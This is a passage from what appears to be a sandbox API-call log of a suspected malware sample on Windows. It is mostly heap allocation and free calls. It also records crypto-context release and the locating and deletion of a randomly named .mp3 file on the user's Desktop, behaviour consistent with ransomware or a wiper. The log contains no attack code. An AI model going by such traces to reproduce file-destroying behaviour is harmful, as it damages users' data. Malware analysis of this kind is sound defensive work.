cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0185.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0185.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0185.618] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0185.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0185.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0185.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0185.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0185.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.618] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0185.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0185.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0185.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0185.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0185.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0185.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0185.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0185.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0185.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0185.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0185.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0185.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0185.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0185.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0185.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0185.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0185.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0185.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0185.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0185.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0185.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0185.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0185.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0185.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0185.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0185.630] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0185.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0185.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0185.630] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0185.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0185.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0185.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0185.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0185.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.630] FreeLibrary (hLibModule=0x756e0000) returned 1 [0185.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0185.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0185.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0185.630] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0185.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.631] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0185.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0185.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0185.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0185.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.631] CloseHandle (hObject=0x2a0) returned 1 [0185.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0185.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0185.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0185.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0185.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0185.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0185.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0185.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0185.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0185.632] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0185.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0185.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0185.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0185.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0185.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0185.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0185.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0185.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0185.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0185.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0185.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0185.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0185.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0185.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0185.633] CloseHandle (hObject=0x2d0) returned 1 [0185.640] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0185.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0185.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0185.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0185.642] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0185.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0185.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0185.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0185.643] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0185.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0185.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0185.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0185.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0185.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0185.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0185.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0185.643] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/i48aq9pLiKOVw_egcT3.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\i48aq9pLiKOVw_egcT3.mp3", lpFilePart=0x8cedf4*="i48aq9pLiKOVw_egcT3.mp3") returned 0x2f [0185.643] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\i48aq9pLiKOVw_egcT3.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\i48aq9plikovw_egct3.mp3")) returned 0x20 [0185.644] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\i48aq9pLiKOVw_egcT3.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ae39040, ftCreationTime.dwHighDateTime=0x1d5e846, ftLastAccessTime.dwLowDateTime=0xfce5a730, ftLastAccessTime.dwHighDateTime=0x1d5e795, ftLastWriteTime.dwLowDateTime=0xfce5a730, ftLastWriteTime.dwHighDateTime=0x1d5e795, nFileSizeHigh=0x0, nFileSizeLow=0xe879, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="i48aq9pLiKOVw_egcT3.mp3", cAlternateFileName="I48AQ9~1.MP3")) returned 0xa873d0 [0185.644] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\i48aq9pLiKOVw_egcT3.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\i48aq9plikovw_egct3.mp3")) returned 1 [0185.744] FindNextFileW (in: hFindFile=0xa873d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ae39040, ftCreationTime.dwHighDateTime=0x1d5e846, ftLastAccessTime.dwLowDateTime=0xfce5a730, ftLastAccessTime.dwHighDateTime=0x1d5e795, ftLastWriteTime.dwLowDateTime=0xfce5a730, ftLastWriteTime.dwHighDateTime=0x1d5e795, nFileSizeHigh=0x0, nFileSizeLow=0xe879, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="i48aq9pLiKOVw_egcT3.mp3", cAlternateFileName="I48AQ9~1.MP3")) returned 0 [0185.744] FindClose (in: hFindFile=0xa873d0 | out: hFindFile=0xa873d0) returned 1 [0185.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0185.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0185.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0185.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0185.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0185.744] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0185.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0185.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0185.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.745] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0185.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0185.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0185.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0185.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0185.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0185.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0185.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0185.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0185.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0185.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0185.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0185.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0185.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0185.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0185.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0185.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0185.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e563a8 [0185.746] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/i48aq9pLiKOVw_egcT3.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\i48aq9pLiKOVw_egcT3.mp3", lpFilePart=0x8cf650*="i48aq9pLiKOVw_egcT3.mp3") returned 0x2f [0185.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0185.746] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\i48aq9pLiKOVw_egcT3.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\i48aq9plikovw_egct3.mp3")) returned 0xffffffff [0185.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0185.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0185.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0185.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0185.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0185.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0185.746] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0185.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0185.746] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0185.746] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0185.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0185.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0185.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0185.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0185.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0185.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0185.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0185.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0185.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0185.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0185.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0185.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 